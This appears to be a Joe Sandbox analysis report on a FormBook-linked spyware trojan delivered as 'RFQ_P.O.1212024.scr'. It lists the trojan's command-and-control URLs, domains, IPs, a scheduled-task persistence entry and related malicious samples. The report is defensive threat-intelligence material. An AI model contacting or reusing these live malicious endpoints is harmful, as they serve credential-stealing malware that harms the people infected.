                http://www.rysanekbeton.cloud/k6bb/?e2E=wRQ8oHXx&x4=Z6Ib5suwfioT2MqU06AO+PAui2zXunW520tiYNnV3r2mKqn+I/1Rk8X6nyOI9yPQWIZ7sVBW06SOuYuNHwSa/K8QYKA8w9Q0BnY6RfjXUsKFmlTp4Coq9mQ/L3NZ0%Avira URL Cloudsafe
                http://www.questmatch.pro/1yxc/?x4=sNv20zOiDYMkOMIZUAMTdfOFf2lUUMo2G3KMZ1n3ZrvJqNyjokS5weFlZhKtUuMXj8jBQ4ipfeoXnmxfx9jFO8nPHTBXwG0erHwEdD0EmkjwsdzIUyNTuEGbdIq/&e2E=wRQ8oHXx0%Avira URL Cloudsafe
                http://www.vayui.top0%Avira URL Cloudsafe
                http://www.kvsj.net/zu0o/0%Avira URL Cloudsafe
                http://www.dietcoffee.online/ugyg/?x4=oCZiSXk+P+GRfK1BPGYe2jAbGy6NfuRnUXBBKsmFkR5XdaXHzOV8cRyPm0SlplEQyKXzoexQZCmJiHD77mrvft/NmZQ5KxY7IzFSGPZt8SE9dF3swuxanCIPkslF&e2E=wRQ8oHXx0%Avira URL Cloudsafe
                http://www.krshop.shop/5p01/?x4=gA6TElZrCKVvAudJqCgIj+rDW60O9S/KrsL6QppRHZfK3DYPsJvxk4hrjtesZ+QJ9tNiW026ZluxU0disiqWvA+4TRd5XHrMIpgHSW93WHtTmPUKepAYQ6lEihd3&e2E=wRQ8oHXx0%Avira URL Cloudsafe
                https://gamesfunny.top$0%Avira URL Cloudsafe
                http://www.dietcoffee.online/ugyg/0%Avira URL Cloudsafe
                http://www.smartcongress.net/m1g9/0%Avira URL Cloudsafe
                http://www.mrpokrovskii.pro/7mvy/0%Avira URL Cloudsafe
                http://www.vayui.top/ge5i/?x4=jPU0HPuwZISEZ5CnqmUb1HxQcmHsEJWSHx9v/3j//xH9iOmom18fULHPXhZRerzvXxOw9xjpncAMgCVYCBSLizB0ok2+/BrdQFUexat22mesfNVGJAdc0xNIeHt8&e2E=wRQ8oHXx0%Avira URL Cloudsafe
                http://www.airrelax.shop/gvzg/?x4=3ZtrxXVK8OpQj/IeinJ3ZiXeAcGxlO+Pqtakmq6NsaDAWPHTfqsTTp3MR0RJjMVggAZP9MES5OMDJz4L+ZnM27rh6ujY7a8DVehBMFx021rrXiLY5F9HpwIHbLcF&e2E=wRQ8oHXx0%Avira URL Cloudsafe
                http://www.rysanekbeton.cloud/k6bb/0%Avira URL Cloudsafe
                http://www.learniit.info/n8su/?e2E=wRQ8oHXx&x4=lFR6PBva/PMsONRXI0WwK0wAlPs3/3LGo4dEt9E07rmpJDSADrt1oQ5wEpxa5wprSOBn2CzJO8jS1Mfo/039O8MFhYDOYZlyw2UFRkURX7D2yJawivbRUB3rqqzd0%Avira URL Cloudsafe
                http://www.vayui.top/ge5i/0%Avira URL Cloudsafe
                http://www.krshop.shop/5p01/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.bankseedz.info
                		46.30.211.38
                		truetrue
                  		unknown
                  www.vayui.top
                  		172.67.145.234
                  		truefalse
                    		high
                    www.learniit.info
                    		203.161.42.73
                    		truetrue
                      		unknown
                      carsten.studio
                      		217.160.0.200
                      		truetrue
                        		unknown
                        www.diozusemails.buzz
                        		69.48.179.238
                        		truetrue
                          		unknown
                          www.airrelax.shop
                          		172.67.215.235
                          		truetrue
                            		unknown
                            natroredirect.natrocdn.com
                            		85.159.66.93
                            		truefalse
                              		high
                              www.krshop.shop
                              		13.248.169.48
                              		truetrue
                                		unknown
                                www.kvsj.net
                                		173.236.199.97
                                		truetrue
                                  		unknown
                                  www.questmatch.pro
                                  		188.114.97.6
                                  		truefalse
                                    		high
                                    www.mrpokrovskii.pro
                                    		85.25.177.138
                                    		truefalse
                                      		high
                                      smartcongress.net
                                      		146.88.233.115
                                      		truefalse
                                        		high
                                        www.dietcoffee.online
                                        		77.68.64.45
                                        		truefalse
                                          		high
                                          www.sqlite.org
                                          		45.33.6.223
                                          		truefalse
                                            		high
                                            rysanekbeton.cloud
                                            		81.2.196.19
                                            		truetrue
                                              		unknown
                                              www.sodatool.site
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.rysanekbeton.cloud
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.zoiheat.xyz
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.carsten.studio
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.tb0.shop
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.smartcongress.net
                                                        		unknown
                                                        		unknownfalse
                                                          		high

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.learniit.info/n8su/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bankseedz.info/an5q/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.mrpokrovskii.pro/7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCH+SaZEqPzQm7dEGcSvaBjSz44Tn+gLzjg3KkouZfQr0KlXeCQD7BohQrjjLoRt3TUvjzHSULJDbynuVmorsgWcKo&e2E=wRQ8oHXxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.carsten.studio/8mom/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.zoiheat.xyz/ti6k/?e2E=wRQ8oHXx&x4=aooN9XnxZY5vLLqjRSo6DpWN4fgsD3CW9S/CD7OrytslWQsmx2XgIWNhq2ot6qnFvMzcVXyCAoOGhogdqicJCN8EOoBxC+Cz12DK8fUp+S6/f8QxRRTszX5C8Y75true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.questmatch.pro/1yxc/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bankseedz.info/an5q/?x4=ht9kvQ/be1JP/b8GmoJbUpka8BxXZHDjKA2fsfIfXx0uGnoFDxCnuQ2Syamf2AV1LytjWJjmrwJ3QA9mKPa/MpeqH9CIj747RQUAZUa71OOzgLnsSxYrvroJ5BNI&e2E=wRQ8oHXxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.airrelax.shop/gvzg/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.rysanekbeton.cloud/k6bb/?e2E=wRQ8oHXx&x4=Z6Ib5suwfioT2MqU06AO+PAui2zXunW520tiYNnV3r2mKqn+I/1Rk8X6nyOI9yPQWIZ7sVBW06SOuYuNHwSa/K8QYKA8w9Q0BnY6RfjXUsKFmlTp4Coq9mQ/L3NZtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.questmatch.pro/1yxc/?x4=sNv20zOiDYMkOMIZUAMTdfOFf2lUUMo2G3KMZ1n3ZrvJqNyjokS5weFlZhKtUuMXj8jBQ4ipfeoXnmxfx9jFO8nPHTBXwG0erHwEdD0EmkjwsdzIUyNTuEGbdIq/&e2E=wRQ8oHXxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.kvsj.net/zu0o/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.dietcoffee.online/ugyg/?x4=oCZiSXk+P+GRfK1BPGYe2jAbGy6NfuRnUXBBKsmFkR5XdaXHzOV8cRyPm0SlplEQyKXzoexQZCmJiHD77mrvft/NmZQ5KxY7IzFSGPZt8SE9dF3swuxanCIPkslF&e2E=wRQ8oHXxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.dietcoffee.online/ugyg/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.krshop.shop/5p01/?x4=gA6TElZrCKVvAudJqCgIj+rDW60O9S/KrsL6QppRHZfK3DYPsJvxk4hrjtesZ+QJ9tNiW026ZluxU0disiqWvA+4TRd5XHrMIpgHSW93WHtTmPUKepAYQ6lEihd3&e2E=wRQ8oHXxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.smartcongress.net/m1g9/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.mrpokrovskii.pro/7mvy/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.vayui.top/ge5i/?x4=jPU0HPuwZISEZ5CnqmUb1HxQcmHsEJWSHx9v/3j//xH9iOmom18fULHPXhZRerzvXxOw9xjpncAMgCVYCBSLizB0ok2+/BrdQFUexat22mesfNVGJAdc0xNIeHt8&e2E=wRQ8oHXxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.rysanekbeton.cloud/k6bb/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.airrelax.shop/gvzg/?x4=3ZtrxXVK8OpQj/IeinJ3ZiXeAcGxlO+Pqtakmq6NsaDAWPHTfqsTTp3MR0RJjMVggAZP9MES5OMDJz4L+ZnM27rh6ujY7a8DVehBMFx021rrXiLY5F9HpwIHbLcF&e2E=wRQ8oHXxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.learniit.info/n8su/?e2E=wRQ8oHXx&x4=lFR6PBva/PMsONRXI0WwK0wAlPs3/3LGo4dEt9E07rmpJDSADrt1oQ5wEpxa5wprSOBn2CzJO8jS1Mfo/039O8MFhYDOYZlyw2UFRkURX7D2yJawivbRUB3rqqzdtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zipfalse
                                                            		high
                                                            http://www.vayui.top/ge5i/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.krshop.shop/5p01/true
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://duckduckgo.com/chrome_newtabmsinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drfalse
                                                              		high
                                                              https://www.mrpokrovskii.pro/7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCHmrNbohrgjTw.exe, 00000014.00000002.873893935.0000000003428000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://duckduckgo.com/ac/?q=msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drfalse
                                                                		high
                                                                https://securepubads.g.doubleclick.net/tag/js/gpt.jsmsinfo32.exe, 0000000C.00000002.874345553.0000000005300000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873979376.000000000410E000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.000000000456E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drfalse
                                                                    		high
                                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchmsinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drfalse
                                                                      		high
                                                                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0RFQ_P.O.1212024.scr, PEJmengI.exe.0.drfalse
                                                                        		high
                                                                        http://www.vayui.topmrNbohrgjTw.exe, 00000014.00000002.873703699.0000000000954000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.google.com/favicon.ico00255Of2.12.drfalse
                                                                          		high
                                                                          https://ac.ecosia.org/autocomplete?q=msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drfalse
                                                                            		high
                                                                            https://playchill.top/api/axgames/request?domain=$msinfo32.exe, 0000000C.00000002.874345553.0000000005300000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873979376.000000000410E000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.000000000456E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://gamesfunny.top$msinfo32.exe, 0000000C.00000002.874345553.0000000005300000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873979376.000000000410E000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.000000000456E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://code.jquery.com/jquery-3.5.1.min.jsmsinfo32.exe, 0000000C.00000002.874345553.0000000005300000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873979376.000000000410E000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.000000000456E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssmsinfo32.exe, 0000000C.00000002.873979376.0000000003610000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.0000000003A70000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ_P.O.1212024.scr, 00000000.00000002.373003710.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, RFQ_P.O.1212024.scr, 00000000.00000002.373003710.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, PEJmengI.exe, 0000000A.00000002.417275627.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, PEJmengI.exe, 0000000A.00000002.417275627.0000000002631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drfalse
                                                                                      		high
                                                                                      http://www.sqlite.org/copyright.html.msinfo32.exe, 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drfalse
                                                                                        		high
                                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drfalse
                                                                                          		high
                                                                                          https://www.strato.demrNbohrgjTw.exe, 00000014.00000002.873893935.00000000040B8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high

                                                                                            World Map of Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public IPs

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            45.33.6.223
                                                                                            		www.sqlite.orgUnited States
                                                                                            		63949LINODE-APLinodeLLCUSfalse
                                                                                            146.88.233.115
                                                                                            		smartcongress.netFrance
                                                                                            		53589PLANETHOSTER-8CAfalse
                                                                                            13.248.169.48
                                                                                            		www.krshop.shopUnited States
                                                                                            		16509AMAZON-02UStrue
                                                                                            81.2.196.19
                                                                                            		rysanekbeton.cloudCzech Republic
                                                                                            		24806INTERNET-CZKtis238403KtisCZtrue
                                                                                            85.159.66.93
                                                                                            		natroredirect.natrocdn.comTurkey
                                                                                            		34619CIZGITRfalse
                                                                                            172.67.215.235
                                                                                            		www.airrelax.shopUnited States
                                                                                            		13335CLOUDFLARENETUStrue
                                                                                            77.68.64.45
                                                                                            		www.dietcoffee.onlineUnited Kingdom
                                                                                            		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                                            217.160.0.200
                                                                                            		carsten.studioGermany
                                                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                            188.114.97.6
                                                                                            		www.questmatch.proEuropean Union
                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                            203.161.42.73
                                                                                            		www.learniit.infoMalaysia
                                                                                            		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                            85.25.177.138
                                                                                            		www.mrpokrovskii.proGermany
                                                                                            		8972GD-EMEA-DC-SXB1DEfalse
                                                                                            172.67.145.234
                                                                                            		www.vayui.topUnited States
                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                            173.236.199.97
                                                                                            		www.kvsj.netUnited States
                                                                                            		26347DREAMHOST-ASUStrue
                                                                                            46.30.211.38
                                                                                            		www.bankseedz.infoDenmark
                                                                                            		51468ONECOMDKtrue

                                                                                            Private

                                                                                            IP
                                                                                            192.168.2.255

                                                                                            General Information

                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1573579
                                                                                            Start date and time:2024-12-12 10:18:46 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 12m 19s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                            Number of analysed new started processes analysed:23
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:2
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:RFQ_P.O.1212024.scr
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winSCR@24/18@25/15
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 80%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 96%
                                                                                            • Number of executed functions: 100
                                                                                            • Number of non-executed functions: 229
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .scr
                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                            Warnings

                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                                            • Execution Graph export aborted for target mrNbohrgjTw.exe, PID 1696 because it is empty
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                            • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            01:19:46Task SchedulerRun new task: PEJmengI path: C:\Users\user\AppData\Roaming\PEJmengI.exe
                                                                                            04:19:38API Interceptor89x Sleep call for process: RFQ_P.O.1212024.scr modified
                                                                                            04:19:45API Interceptor3x Sleep call for process: schtasks.exe modified
                                                                                            04:19:45API Interceptor109x Sleep call for process: powershell.exe modified
                                                                                            04:19:47API Interceptor397x Sleep call for process: taskeng.exe modified
                                                                                            04:19:49API Interceptor118x Sleep call for process: PEJmengI.exe modified
                                                                                            04:20:12API Interceptor4808x Sleep call for process: mrNbohrgjTw.exe modified
                                                                                            04:20:17API Interceptor12821512x Sleep call for process: msinfo32.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            45.33.6.223PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                            • www.sqlite.org/2016/sqlite-dll-win32-x86-3110000.zip
                                                                                            HZ1ZzlIpm7.vbeGet hashmaliciousFormBookBrowse
                                                                                            • www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
                                                                                            RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.sqlite.org/2019/sqlite-dll-win32-x86-3290000.zip
                                                                                            0CkEHZjZgO.vbsGet hashmaliciousFormBookBrowse
                                                                                            • www.sqlite.org/2020/sqlite-dll-win32-x86-3320000.zip
                                                                                            RFQ.docxGet hashmaliciousFormBookBrowse
                                                                                            • www.sqlite.org/2018/sqlite-dll-win32-x86-3250000.zip
                                                                                            SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
                                                                                            Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                                                                                            • www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip
                                                                                            SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                            • www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
                                                                                            IND24072113.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
                                                                                            ekte.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                                                                                            146.88.233.115PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.smartcongress.net/qtfx/
                                                                                            NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.smartcongress.net/m1g9/
                                                                                            Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • www.smartcongress.net/qtfx/
                                                                                            W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • www.smartcongress.net/11t3/
                                                                                            Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • www.smartcongress.net/11t3/
                                                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.smartcongress.net/qtfx/
                                                                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.smartcongress.net/11t3/
                                                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.smartcongress.net/11t3/
                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.smartcongress.net/11t3/
                                                                                            13.248.169.48SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                            • sharewood.xyz/administrator/index.php
                                                                                            MA-DS-2024-03 URGENT.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.snyp.shop/4nyz/
                                                                                            Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.egyshare.xyz/lp5b/
                                                                                            AWB_5771388044 Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.avalanchefi.xyz/ctta/
                                                                                            AWB_5771388044 Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.avalanchefi.xyz/ctta/
                                                                                            Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.hsa.world/09b7/
                                                                                            MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.lovel.shop/rxts/
                                                                                            RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.snyp.shop/4nyz/
                                                                                            NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.krshop.shop/5p01/
                                                                                            DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.egyshare.xyz/440l/

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            www.bankseedz.infoNEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • 46.30.211.38
                                                                                            Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 46.30.211.38
                                                                                            Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                            • 46.30.211.38
                                                                                            PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                            • 46.30.211.38
                                                                                            www.learniit.infoNEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • 203.161.42.73
                                                                                            www.vayui.topNEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • 172.67.145.234
                                                                                            ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                            • 172.67.145.234
                                                                                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                            • 104.21.95.160
                                                                                            Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                                            • 172.67.145.234
                                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 172.67.145.234
                                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                            • 104.21.95.160
                                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                            • 172.67.145.234
                                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 172.67.145.234
                                                                                            S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 104.21.95.160
                                                                                            purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                            • 172.67.145.234
                                                                                            www.airrelax.shopNEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • 172.67.215.235
                                                                                            Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                                            • 172.67.215.235
                                                                                            IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 104.21.16.206

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            AMAZON-02UShttps://url41.mailanyone.net/scanner?m=1tLLkn-000000000Cu-3MPx&d=4%7Cmail%2F90%2F1733919600%2F1tLLkn-000000000Cu-3MPx%7Cin41e%7C57e1b682%7C16739527%7C12325088%7C67598451340A7E7E34A434AD05811D2E&o=%2Fphts%3A%2Futs.s-wr-2petncotsio.etooop%2F.cmhser%3Fd%26.dv%3D2HHu%3D60cMaRtwLyzWIN9dDWQ0j0ZBOMkiZTWDNZlNTGFmj1MdNMhhZDGDZOROGjYu2uZVcIshL13m9bRZWmNz%3D0bwLhYN%26iQVjj%3DWgZ2MNNTwzmZZWIZJlWwW%3DFkM0%26tM2l121NaQSdK5YKQ3FWZeheTURUTubJOt2oOSTWgZtZT2BvQlNBQl%3DUSThT0%26lR04%3D4d05f88a4f83c102fc8d7af5079V%266bP%3DANdsFUUEk0NThTVVNScUSYWBBbgJ7rzlyn1ERkBSzh9qmzIX6xvrbsyM8qb6f4HC59eiDbrDsPv9W1mhDcOFm%23uMyW5bUaWm5iAtZ5cVujem228YFYt9&s=dQ2VS6ieQ8nkhuwt32k9X8A6qOUGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 13.227.8.58
                                                                                            https://acg.citnow.com/dashboardGet hashmaliciousUnknownBrowse
                                                                                            • 18.135.94.120
                                                                                            mips.xxx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 34.249.145.219
                                                                                            SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                            • 18.139.62.226
                                                                                            jew.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                            • 18.226.64.181
                                                                                            jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                                            • 52.52.10.186
                                                                                            jew.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                            • 54.195.68.141
                                                                                            jew.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                            • 34.247.205.175
                                                                                            https://newdocumentsproposal.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                            • 13.227.9.227
                                                                                            x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                            • 100.20.19.195
                                                                                            INTERNET-CZKtis238403KtisCZNEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            jmggnxeedy.elfGet hashmaliciousUnknownBrowse
                                                                                            • 81.2.245.22
                                                                                            lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            New quotation request.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            89778Cpy.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            UNGSno5k4G.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            PLANETHOSTER-8CAPO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                            • 146.88.233.115
                                                                                            NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
